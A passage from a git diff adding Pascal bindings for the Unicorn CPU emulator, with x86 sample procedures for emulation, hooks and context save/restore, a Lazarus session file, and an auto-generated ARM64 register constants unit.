ADDRESS + SizeOf(X86_CODE32_INOUT) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure test_i386_context_save(); +var + uc: uc_engine; + context : uc_context; + err: uc_err; + r_eax : integer; +begin + r_eax := 1; // EAX register + WriteLn('==================================='); + WriteLn('Emulate i386 code - Save/restore CPU context in opaque blob'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + uc_mem_map(uc,ADDRESS,8 * 1024 , UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INC, SizeOf(X86_CODE32_INC) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + uc_close(uc); + Exit; + end; + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, @r_eax); + + // emulate machine code in infinite time + writeln('>>> Running emulation for the first time'); + err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + Writeln('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); + WriteLn(Format('>>> EAX = 0x%x', [r_eax])); + + Writeln('>>> Saving CPU context'); + + err := uc_context_alloc(uc,context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_context_alloc() with error returned %u : %s', [err, uc_strerror(err)])); + exit; + end; + + err := uc_context_save(uc, context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_context_save() with error returned %u : %s', [err, uc_strerror(err)])); + exit; + end; + + Writeln('>>> Running emulation for the second time'); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + Writeln('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); + WriteLn(Format('>>> EAX = 0x%x', [r_eax])); + + err := uc_context_restore(uc, context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_context_restore() with error returned %u: %s', [err, uc_strerror(err)])); + exit; + end; + + Writeln('>>> CPU context restored. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); + WriteLn(Format('>>> EAX = 0x%x', [r_eax])); + + err := uc_free(context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_free() with error returned %u: %s', [err, uc_strerror(err)])); + exit; + end; + + uc_close(uc); +end; + +procedure TestX86_64; +var + uc: uc_engine; + err: uc_err; + trace1, trace2, trace3, trace4: uc_hook; + rax, rbx, rcx, rdx, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15, rsp: UInt64; +begin + rax := $71f3029efd49d41d; + rbx := $d87b45277f133ddb; + rcx := $ab40d1ffd8afc461; + rdx := $919317b4a733f01; + rsi := $4c24e753a17ea358; + rdi := $e509a57d2571ce96; + r8 := $ea5b108cc2b9ab1f; + r9 := $19ec097c8eb618c1; + r10 := $ec45774f00c5f682; + r11 := $e17e9dbec8c074aa; + r12 := $80f86a8dc0f6d457; + r13 := $48288ca5671c5492; + r14 := $595f72f6e4017f6e; + r15 := $1efd97aea331cccc; + + rsp := ADDRESS + $200000; + + WriteLn('Emulate x86_64 code'); + + // Initialize emulator in X86-64bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE64, SizeOf(X86_CODE64) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_RSP, @rsp); + + uc_reg_write(uc, UC_X86_REG_RAX, @rax); + uc_reg_write(uc, UC_X86_REG_RBX, @rbx); + uc_reg_write(uc, UC_X86_REG_RCX, @rcx); + uc_reg_write(uc, UC_X86_REG_RDX, @rdx); + uc_reg_write(uc, UC_X86_REG_RSI, @rsi); + uc_reg_write(uc, UC_X86_REG_RDI, @rdi); + uc_reg_write(uc, UC_X86_REG_R8, @r8); + uc_reg_write(uc, UC_X86_REG_R9, @r9); + uc_reg_write(uc, UC_X86_REG_R10, @r10); + uc_reg_write(uc, UC_X86_REG_R11, @r11); + uc_reg_write(uc, UC_X86_REG_R12, @r12); + uc_reg_write(uc, UC_X86_REG_R13, @r13); + uc_reg_write(uc, UC_X86_REG_R14, @r14); + uc_reg_write(uc, UC_X86_REG_R15, @r15); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode64, nil, ADDRESS, ADDRESS + 20,[]); + + // tracing all memory WRITE access (with @begin > @end) + uc_hook_add(uc, trace3, UC_HOOK_MEM_WRITE, @HookMem64, nil, 1, 0,[]); + // tracing all memory READ access (with @begin > @end) + uc_hook_add(uc, trace4, UC_HOOK_MEM_READ, @HookMem64, nil, 1, 0,[]); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_RAX, @rax); + uc_reg_read(uc, UC_X86_REG_RBX, @rbx); + uc_reg_read(uc, UC_X86_REG_RCX, @rcx); + uc_reg_read(uc, UC_X86_REG_RDX, @rdx); + uc_reg_read(uc, UC_X86_REG_RSI, @rsi); + uc_reg_read(uc, UC_X86_REG_RDI, @rdi); + uc_reg_read(uc, UC_X86_REG_R8, @r8); + uc_reg_read(uc, UC_X86_REG_R9, @r9); + uc_reg_read(uc, UC_X86_REG_R10, @r10); + uc_reg_read(uc, UC_X86_REG_R11, @r11); + uc_reg_read(uc, UC_X86_REG_R12, @r12); + uc_reg_read(uc, UC_X86_REG_R13, @r13); + uc_reg_read(uc, UC_X86_REG_R14, @r14); + uc_reg_read(uc, UC_X86_REG_R15, @r15); + + WriteLn(Format('>>> RAX = 0x%.16x', [rax])); + WriteLn(Format('>>> RBX = 0x%.16x', [rbx])); + WriteLn(Format('>>> RCX = 0x%.16x', [rcx])); + WriteLn(Format('>>> RDX = 0x%.16x', [rdx])); + WriteLn(Format('>>> RSI = 0x%.16x', [rsi])); + WriteLn(Format('>>> RDI = 0x%.16x', [rdi])); + WriteLn(Format('>>> R8 = 0x%.16x', [r8])); + WriteLn(Format('>>> R9 = 0x%.16x', [r9])); + WriteLn(Format('>>> R10 = 0x%.16x', [r10])); + WriteLn(Format('>>> R11 = 0x%.16x', [r11])); + WriteLn(Format('>>> R12 = 0x%.16x', [r12])); + WriteLn(Format('>>> R13 = 0x%.16x', [r13])); + WriteLn(Format('>>> R14 = 0x%.16x', [r14])); + WriteLn(Format('>>> R15 = 0x%.16x', [r15])); + + uc_close(uc); +end; + +procedure TestX86_64Syscall; +var + uc: uc_engine; + err: uc_err; + trace1: uc_hook; + rax: UInt64; +begin + rax := $100; + WriteLn('==================================='); + WriteLn('Emulate x86_64 code with "syscall" instruction'); + + // Initialize emulator in X86-64bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE64_SYSCALL, SizeOf(X86_CODE64_SYSCALL) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // hook interrupts for syscall + uc_hook_add(uc, trace1, UC_HOOK_INSN, @HookSyscall, nil, 1 , 0 , [UC_X86_INS_SYSCALL]); + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_RAX, @rax); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64_SYSCALL) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_RAX, @rax); + WriteLn(Format('>>> RAX = 0x%x', [rax])); + + uc_close(uc); +end; + +procedure TestX86_16; +var + uc: uc_engine; + err: uc_err; + tmp: Word; + eax, ebx, esi: UInt32; +begin + eax := 7; + ebx := 5; + esi := 6; + + WriteLn('Emulate x86 16-bit code'); + + // Initialize emulator in X86-16bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_16, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 8KB memory for this emulation + uc_mem_map(uc, 0, 8 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, 0, @X86_CODE16, SizeOf(X86_CODE16) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, @eax); + uc_reg_write(uc, UC_X86_REG_EBX, @ebx); + uc_reg_write(uc, UC_X86_REG_ESI, @esi); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + err := uc_emu_start(uc, 0, SizeOf(X86_CODE16) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + err := uc_mem_read_(uc, 11, @tmp, 1); + if (err = UC_ERR_OK) then + WriteLn(Format('>>> Read 1 bytes from [0x%x] = 0x%x', [11, tmp])) + else + WriteLn(Format('>>> Failed to read 1 bytes from [0x%x]', [11])); + + uc_close(uc); +end; + +begin + if ParamCount > 0 then begin + if (ParamStr(1) = '-32') then begin + TestI386; + test_i386_map_ptr; + test_i386_context_save; + TestI386Inout; + TestI386Jump; + TestI386Loop; + TestI386InvalidMemRead; + TestI386InvalidMemWrite; + TestI386JumpInvalid; + end; + + if (ParamStr(1) = '-64') then begin + TestX86_64; + TestX86_64Syscall; + end; + + if (ParamStr(1) = '-16') then begin + TestX86_16; + end; + + end else + WriteLn(#10'Syntax: SampleX86 <-16|-32|-64>'#10); +end. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lps b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lps new file mode 100644 index 0000000..8ea924e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lps @@ -0,0 +1,197 @@ +<?xml version="1.0" encoding="UTF-8"?> +<CONFIG> + <ProjectSession> + <Version Value="10"/> + <BuildModes Active="Debug"/> + <Units Count="10"> + <Unit0> + <Filename Value="x86.lpr"/> + <IsPartOfProject Value="True"/> + <TopLine Value="8"/> + <CursorPos X="34" Y="4"/> + <UsageCount Value="21"/> + <Loaded Value="True"/> + </Unit0> + <Unit1> + <Filename Value="../unicorn/UnicornConst.pas"/> + <EditorIndex Value="-1"/> + <CursorPos X="25" Y="2"/> + <UsageCount Value="10"/> + </Unit1> + <Unit2> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <IsVisibleTab Value="True"/> + <EditorIndex Value="1"/> + <CursorPos X="80" Y="3"/> + <UsageCount Value="10"/> + <Loaded Value="True"/> + </Unit2> + <Unit3> + <Filename Value="/usr/local/share/fpcsrc/rtl/objpas/sysutils/sysstrh.inc"/> + <EditorIndex Value="-1"/> + <TopLine Value="71"/> + <CursorPos X="25" Y="77"/> + <UsageCount Value="10"/> + </Unit3> + <Unit4> + <Filename Value="/usr/local/share/fpcsrc/rtl/inc/systemh.inc"/> + <EditorIndex Value="-1"/> + <TopLine Value="331"/> + <CursorPos X="3" Y="339"/> + <UsageCount Value="10"/> + </Unit4> + <Unit5> + <Filename Value="/usr/local/share/fpcsrc/packages/rtl-console/src/unix/crt.pp"/> + <UnitName Value="Crt"/> + <EditorIndex Value="-1"/> + <TopLine Value="1104"/> + <CursorPos X="7" Y="534"/> + <UsageCount Value="10"/> + </Unit5> + <Unit6> + <Filename Value="/usr/local/share/fpcsrc/packages/rtl-console/src/inc/crth.inc"/> + <EditorIndex Value="-1"/> + <TopLine Value="31"/> + <CursorPos X="11" Y="44"/> + <UsageCount Value="10"/> + </Unit6> + <Unit7> + <Filename Value="/usr/local/share/fpcsrc/rtl/darwin/termio.pp"/> + <EditorIndex Value="-1"/> + <TopLine Value="24"/> + <UsageCount Value="10"/> + </Unit7> + <Unit8> + <Filename Value="../unicorn/X86Const.pas"/> + <EditorIndex Value="-1"/> + <CursorPos X="57"/> + <UsageCount Value="10"/> + </Unit8> + <Unit9> + <Filename Value="/usr/local/share/fpcsrc/rtl/inc/dynlibs.pas"/> + <EditorIndex Value="-1"/> + <TopLine Value="46"/> + <CursorPos X="25" Y="53"/> + <UsageCount Value="10"/> + </Unit9> + </Units> + <JumpHistory Count="26" HistoryIndex="25"> + <Position1> + <Filename Value="x86.lpr"/> + <Caret Line="332" TopLine="323"/> + </Position1> + <Position2> + <Filename Value="x86.lpr"/> + <Caret Line="333" TopLine="323"/> + </Position2> + <Position3> + <Filename Value="x86.lpr"/> + <Caret Line="338" TopLine="331"/> + </Position3> + <Position4> + <Filename Value="x86.lpr"/> + <Caret Line="340" Column="42" TopLine="330"/> + </Position4> + <Position5> + <Filename Value="x86.lpr"/> + <Caret Line="339" Column="29" TopLine="335"/> + </Position5> + <Position6> + <Filename Value="x86.lpr"/> + <Caret Line="684" Column="42" TopLine="507"/> + </Position6> + <Position7> + <Filename Value="x86.lpr"/> + <Caret Line="51" Column="73" TopLine="43"/> + </Position7> + <Position8> + <Filename Value="x86.lpr"/> + <Caret Line="32" Column="16" TopLine="27"/> + </Position8> + <Position9> + <Filename Value="x86.lpr"/> + <Caret Line="895" Column="18" TopLine="889"/> + </Position9> + <Position10> + <Filename Value="x86.lpr"/> + <Caret Line="894" Column="6" TopLine="889"/> + </Position10> + <Position11> + <Filename Value="x86.lpr"/> + <Caret Line="52" Column="73" TopLine="44"/> + </Position11> + <Position12> + <Filename Value="x86.lpr"/> + <Caret Line="279" TopLine="268"/> + </Position12> + <Position13> + <Filename Value="x86.lpr"/> + <Caret Line="280" Column="26" TopLine="272"/> + </Position13> + <Position14> + <Filename Value="x86.lpr"/> + <Caret Line="898" Column="16" TopLine="883"/> + </Position14> + <Position15> + <Filename Value="x86.lpr"/> + <Caret Line="889" Column="40" TopLine="879"/> + </Position15> + <Position16> + <Filename Value="x86.lpr"/> + <Caret Line="447" Column="44" TopLine="440"/> + </Position16> + <Position17> + <Filename Value="x86.lpr"/> + <Caret Line="894" Column="12" TopLine="887"/> + </Position17> + <Position18> + <Filename Value="x86.lpr"/> + <Caret Line="255" Column="28" TopLine="247"/> + </Position18> + <Position19> + <Filename Value="x86.lpr"/> + <Caret Line="984" Column="8" TopLine="973"/> + </Position19> + <Position20> + <Filename Value="x86.lpr"/> + <Caret Line="987" Column="9" TopLine="976"/> + </Position20> + <Position21> + <Filename Value="x86.lpr"/> + <Caret Line="22" Column="15" TopLine="17"/> + </Position21> + <Position22> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="128" Column="37" TopLine="119"/> + </Position22> + <Position23> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="600" TopLine="597"/> + </Position23> + <Position24> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="9" Column="3" TopLine="8"/> + </Position24> + <Position25> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="640" Column="15" TopLine="632"/> + </Position25> + <Position26> + <Filename Value="x86.lpr"/> + <Caret Line="989" Column="132" TopLine="6"/> + </Position26> + </JumpHistory> + </ProjectSession> + <Debugging> + <Watches Count="2"> + <Item1> + <Expression Value="mem"/> + <DisplayStyle Value="wdfPointer"/> + </Item1> + <Item2> + <Expression Value="X86_CODE32"/> + <DisplayStyle Value="wdfMemDump"/> + </Item2> + </Watches> + </Debugging> +</CONFIG> diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Arm64Const.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Arm64Const.pas new file mode 100644 index 0000000..d348039 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Arm64Const.pas @@ -0,0 +1,319 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit Arm64Const; + +interface + +const +// ARM64 registers + + UC_ARM64_REG_INVALID = 0; + UC_ARM64_REG_X29 = 1; + UC_ARM64_REG_X30 = 2; + UC_ARM64_REG_NZCV = 3; + UC_ARM64_REG_SP = 4; + UC_ARM64_REG_WSP = 5; + UC_ARM64_REG_WZR = 6; + UC_ARM64_REG_XZR = 7; + UC_ARM64_REG_B0 = 8; + UC_ARM64_REG_B1 = 9; + UC_ARM64_REG_B2 = 10; + UC_ARM64_REG_B3 = 11; + UC_ARM64_REG_B4 = 12; + UC_ARM64_REG_B5 = 13; + UC_ARM64_REG_B6 = 14; + UC_ARM64_REG_B7 = 15; + UC_ARM64_REG_B8 = 16; + UC_ARM64_REG_B9 = 17; + UC_ARM64_REG_B10 = 18; + UC_ARM64_REG_B11 = 19; + UC_ARM64_REG_B12 = 20; + UC_ARM64_REG_B13 = 21; + UC_ARM64_REG_B14 = 22; + UC_ARM64_REG_B15 = 23; + UC_ARM64_REG_B16 = 24; + UC_ARM64_REG_B17 = 25; + UC_ARM64_REG_B18 = 26; + UC_ARM64_REG_B19 = 27; + UC_ARM64_REG_B20 = 28; + UC_ARM64_REG_B21 = 29; + UC_ARM64_REG_B22 = 30; + UC_ARM64_REG_B23 = 31; + UC_ARM64_REG_B24 = 32; + UC_ARM64_REG_B25 = 33; + UC_ARM64_REG_B26 = 34; + UC_ARM64_REG_B27 = 35; + UC_ARM64_REG_B28 = 36; + UC_ARM64_REG_B29 = 37; + UC_ARM64_REG_B30 = 38; + UC_ARM64_REG_B31 = 39; + UC_ARM64_REG_D0 = 40; + UC_ARM64_REG_D1 = 41; + UC_ARM64_REG_D2 = 42; + UC_ARM64_REG_D3 = 43; + UC_ARM64_REG_D4 = 44; + UC_ARM64_REG_D5 = 45; + UC_ARM64_REG_D6 = 46; + UC_ARM64_REG_D7 = 47; + UC_ARM64_REG_D8 = 48; + UC_ARM64_REG_D9 = 49; + UC_ARM64_REG_D10 = 50; + UC_ARM64_REG_D11 = 51; + UC_ARM64_REG_D12 = 52; + UC_ARM64_REG_D13 = 53; + UC_ARM64_REG_D14 = 54; + UC_ARM64_REG_D15 = 55; + UC_ARM64_REG_D16 = 56; + UC_ARM64_REG_D17 = 57; + UC_ARM64_REG_D18 = 58; + UC_ARM64_REG_D19 = 59; + UC_ARM64_REG_D20 = 60; + UC_ARM64_REG_D21 = 61; + UC_ARM64_REG_D22 = 62; + UC_ARM64_REG_D23 = 63; + UC_ARM64_REG_D24 = 64; + UC_ARM64_REG_D25 = 65; + UC_ARM64_REG_D26 = 66; + UC_ARM64_REG_D27 = 67; + UC_ARM64_REG_D28 = 68; + UC_ARM64_REG_D29 = 69; + UC_ARM64_REG_D30 = 70; + UC_ARM64_REG_D31 = 71; + UC_ARM64_REG_H0 = 72; + UC_ARM64_REG_H1 = 73; + UC_ARM64_REG_H2 = 74; + UC_ARM64_REG_H3 = 75; + UC_ARM64_REG_H4 = 76; + UC_ARM64_REG_H5 = 77; + UC_ARM64_REG_H6 = 78; + UC_ARM64_REG_H7 = 79; + UC_ARM64_REG_H8 = 80; + UC_ARM64_REG_H9 = 81; + UC_ARM64_REG_H10 = 82; + UC_ARM64_REG_H11 = 83; + UC_ARM64_REG_H12 = 84; + UC_ARM64_REG_H13 = 85; + UC_ARM64_REG_H14 = 86; + UC_ARM64_REG_H15 = 87; + UC_ARM64_REG_H16 = 88; + UC_ARM64_REG_H17 = 89; + UC_ARM64_REG_H18 = 90; + UC_ARM64_REG_H19 = 91; + UC_ARM64_REG_H20 = 92; + UC_ARM64_REG_H21 = 93; + UC_ARM64_REG_H22 = 94; + UC_ARM64_REG_H23 = 95; + UC_ARM64_REG_H24 = 96; + UC_ARM64_REG_H25 = 97; + UC_ARM64_REG_H26 = 98; + UC_ARM64_REG_H27 = 99; + UC_ARM64_REG_H28 = 100; + UC_ARM64_REG_H29 = 101; + UC_ARM64_REG_H30 = 102; + UC_ARM64_REG_H31 = 103; + UC_ARM64_REG_Q0 = 104; + UC_ARM64_REG_Q1 = 105; + UC_ARM64_REG_Q2 = 106; + UC_ARM64_REG_Q3 = 107; + UC_ARM64_REG_Q4 = 108; + UC_ARM64_REG_Q5 = 109; + UC_ARM64_REG_Q6 = 110; + UC_ARM64_REG_Q7 = 111; + UC_ARM64_REG_Q8 = 112; + UC_ARM64_REG_Q9 = 113; + UC_ARM64_REG_Q10 = 114; + UC_ARM64_REG_Q11 = 115; + UC_ARM64_REG_Q12 = 116; + UC_ARM64_REG_Q13 = 117; + UC_ARM64_REG_Q14 = 118; + UC_ARM64_REG_Q15 = 119; + UC_ARM64_REG_Q16 = 120; + UC_ARM64_REG_Q17 = 121; + UC_ARM64_REG_Q18 = 122; + UC_ARM64_REG_Q19 = 123; + UC_ARM64_REG_Q20 = 124; + UC_ARM64_REG_Q21 = 125; + UC_ARM64_REG_Q22 = 126; + UC_ARM64_REG_Q23 = 127; + UC_ARM64_REG_Q24 = 128; + UC_ARM64_REG_Q25 = 129; + UC_ARM64_REG_Q26 = 130; + UC_ARM64_REG_Q27 = 131; + UC_ARM64_REG_Q28 = 132; + UC_ARM64_REG_Q29 = 133; + UC_ARM64_REG_Q30 = 134; + UC_ARM64_REG_Q31 = 135; + UC_ARM64_REG_S0 = 136; + UC_ARM64_REG_S1 = 137; + UC_ARM64_REG_S2 = 138; + UC_ARM64_REG_S3 = 139; + UC_ARM64_REG_S4 = 140; + UC_ARM64_REG_S5 = 141; + UC_ARM64_REG_S6 = 142; + UC_ARM64_REG_S7 = 143; + UC_ARM64_REG_S8 = 144; + UC_ARM64_REG_S9 = 145; + UC_ARM64_REG_S10 = 146; + UC_ARM64_REG_S11 = 147; + UC_ARM64_REG_S12 = 148; + UC_ARM64_REG_S13 = 149; + UC_ARM64_REG_S14 = 150; + UC_ARM64_REG_S15 = 151; + UC_ARM64_REG_S16 = 152; + UC_ARM64_REG_S17 = 153; + UC_ARM64_REG_S18 = 154; + UC_ARM64_REG_S19 = 155; + UC_ARM64_REG_S20 = 156; + UC_ARM64_REG_S21 = 157; + UC_ARM64_REG_S22 = 158; + UC_ARM64_REG_S23 = 159; + UC_ARM64_REG_S24 = 160; + UC_ARM64_REG_S25 = 161; + UC_ARM64_REG_S26 = 162; + UC_ARM64_REG_S27 = 163; + UC_ARM64_REG_S28 = 164; + UC_ARM64_REG_S29 = 165; + UC_ARM64_REG_S30 = 166; + UC_ARM64_REG_S31 = 167; + UC_ARM64_REG_W0 = 168; + UC_ARM64_REG_W1 = 169; + UC_ARM64_REG_W2 = 170; + UC_ARM64_REG_W3 = 171; + UC_ARM64_REG_W4 = 172; + UC_ARM64_REG_W5 = 173; + UC_ARM64_REG_W6 = 174; + UC_ARM64_REG_W7 = 175; + UC_ARM64_REG_W8 = 176; + UC_ARM64_REG_W9 = 177; + UC_ARM64_REG_W10 = 178; + UC_ARM64_REG_W11 = 179; + UC_ARM64_REG_W12 = 180; + UC_ARM64_REG_W13 = 181; + UC_ARM64_REG_W14 = 182; + UC_ARM64_REG_W15 = 183; + UC_ARM64_REG_W16 = 184; + UC_ARM64_REG_W17 = 185; + UC_ARM64_REG_W18 = 186; + UC_ARM64_REG_W19 = 187; + UC_ARM64_REG_W20 = 188; + UC_ARM64_REG_W21 = 189; + UC_ARM64_REG_W22 = 190; + UC_ARM64_REG_W23 = 191; + UC_ARM64_REG_W24 = 192; + UC_ARM64_REG_W25 = 193; + UC_ARM64_REG_W26 = 194; + UC_ARM64_REG_W27 = 195; + UC_ARM64_REG_W28 = 196; + UC_ARM64_REG_W29 = 197; + UC_ARM64_REG_W30 = 198; + UC_ARM64_REG_X0 = 199; + UC_ARM64_REG_X1 = 200; + UC_ARM64_REG_X2 = 201; + UC_ARM64_REG_X3 = 202; + UC_ARM64_REG_X4 = 203; + UC_ARM64_REG_X5 = 204; + UC_ARM64_REG_X6 = 205; + UC_ARM64_REG_X7 = 206; + UC_ARM64_REG_X8 = 207; + UC_ARM64_REG_X9 = 208; + UC_ARM64_REG_X10 = 209; + UC_ARM64_REG_X11 = 210; + UC_ARM64_REG_X12 = 211; + UC_ARM64_REG_X13 = 212; + UC_ARM64_REG_X14 = 213; + UC_ARM64_REG_X15 = 214; + UC_ARM64_REG_X16 = 215; + UC_ARM64_REG_X17 = 216; + UC_ARM64_REG_X18 = 217; + UC_ARM64_REG_X19 = 218; + UC_ARM64_REG_X20 = 219; + UC_ARM64_REG_X21 = 220; + UC_ARM64_REG_X22 = 221; + UC_ARM64_REG_X23 = 222; + UC_ARM64_REG_X24 = 223; + UC_ARM64_REG_X25 = 224; + UC_ARM64_REG_X26 = 225; + UC_ARM64_REG_X27 = 226; + UC_ARM64_REG_X28 = 227; + UC_ARM64_REG_V0 = 228; + UC_ARM64_REG_V1 = 229; + UC_ARM64_REG_V2 = 230; + UC_ARM64_REG_V3 = 231; + UC_ARM64_REG_V4 = 232; + UC_ARM64_REG_V5 = 233; + UC_ARM64_REG_V6 = 234; + UC_ARM64_REG_V7 = 235; + UC_ARM64_REG_V8 = 236; + UC_ARM64_REG_V9 = 237; + UC_ARM64_REG_V10 = 238; + UC_ARM64_REG_V11 = 239; + UC_ARM64_REG_V12 = 240; + UC_ARM64_REG_V13 = 241; + UC_ARM64_REG_V14 = 242; + UC_ARM64_REG_V15 = 243; + UC_ARM64_REG_V16 = 244; + UC_ARM64_REG_V17 = 245; + UC_ARM64_REG_V18 = 246; + UC_ARM64_REG_V19 = 247; + UC_ARM64_REG_V20 = 248; + UC_ARM64_REG_V21 = 249; + UC_ARM64_REG_V22 = 250; + UC_ARM64_REG_V23 = 251; + UC_ARM64_REG_V24 = 252; + UC_ARM64_REG_V25 = 253; + UC_ARM64_REG_V26 = 254; + UC_ARM64_REG_V27 = 255; + UC_ARM64_REG_V28 = 256; + UC_ARM64_REG_V29 = 257; + UC_ARM64_REG_V30 = 258; + UC_ARM64_REG_V31 = 259; + +// pseudo registers + UC_ARM64_REG_PC = 260; + UC_ARM64_REG_CPACR_EL1 = 261; + +// thread registers + UC_ARM64_REG_TPIDR_EL0 = 262; + UC_ARM64_REG_TPIDRRO_EL0 = 263; + UC_ARM64_REG_TPIDR_EL1 = 264; + UC_ARM64_REG_PSTATE = 265; + +// exception link registers + UC_ARM64_REG_ELR_EL0 = 266; + UC_ARM64_REG_ELR_EL1 = 267; + UC_ARM64_REG_ELR_EL2 = 268; + UC_ARM64_REG_ELR_EL3 = 269; + +// stack pointers registers + UC_ARM64_REG_SP_EL0 = 270; + UC_ARM64_REG_SP_EL1 = 271; + UC_ARM64_REG_SP_EL2 = 272; + UC_ARM64_REG_SP_EL3 = 273; + +// other CP15 registers + UC_ARM64_REG_TTBR0_EL1 = 274; + UC_ARM64_REG_TTBR1_EL1 = 275; + UC_ARM64_REG_ESR_EL0 = 276; + UC_ARM64_REG_ESR_EL1 = 277; + UC_ARM64_REG_ESR_EL2 = 278; + UC_ARM64_REG_ESR_EL3 = 279; + UC_ARM64_REG_FAR_EL0 = 280; + UC_ARM64_REG_FAR_EL1 = 281; + UC_ARM64_REG_FAR_EL2 = 282; + UC_ARM64_REG_FAR_EL3 = 283; + UC_ARM64_REG_PAR_EL1 = 284; + UC_ARM64_REG_MAIR_EL1 = 285; + UC_ARM64_REG_VBAR_EL0 = 286; + UC_ARM64_REG_VBAR_EL1 = 287; + UC_ARM64_REG_VBAR_EL2 = 288; + UC_ARM64_REG_VBAR_EL3 = 289; + UC_ARM64_REG_ENDING = 290; + +// alias registers + UC_ARM64_REG_IP0 = 215; + UC_ARM64_REG_IP1 = 216; + UC_ARM64_REG_FP = 1; + UC_ARM64_REG_LR = 2; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/ArmConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/ArmConst.pas new file mode 